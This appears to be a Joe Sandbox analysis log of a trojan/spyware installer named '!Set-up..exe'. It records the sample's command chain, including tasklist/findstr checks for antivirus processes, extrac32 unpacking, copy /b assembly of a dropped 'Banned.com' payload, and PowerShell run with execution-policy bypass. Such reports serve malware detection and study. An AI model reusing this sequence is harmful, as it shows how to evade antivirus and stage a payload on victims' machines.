      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49821 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49831 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.5:49836 version: TLS 1.2
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\OnceBusinessesJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\BuysGothicJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\RdBelievesJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\HierarchyConstantlyJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: String function: 004062CF appears 58 times
      Source: !Set-up..exeStatic PE information: invalid certificate
      Source: !Set-up..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/28@3/2
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ScoutJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4012:120:WilError_03
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Users\user\AppData\Local\Temp\nsoCE2E.tmpJump to behavior
      Source: !Set-up..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\!Set-up..exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: !Set-up..exeVirustotal: Detection: 15%
      Source: !Set-up..exeReversingLabs: Detection: 16%
      Source: C:\Users\user\Desktop\!Set-up..exeFile read: C:\Users\user\Desktop\!Set-up..exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\!Set-up..exe "C:\Users\user\Desktop\!Set-up..exe"
      Source: C:\Users\user\Desktop\!Set-up..exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\!Set-up..exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E EcJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1"Jump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: !Set-up..exeStatic file information: File size 14866519 > 1048576
      Source: !Set-up..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comJump to dropped file
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
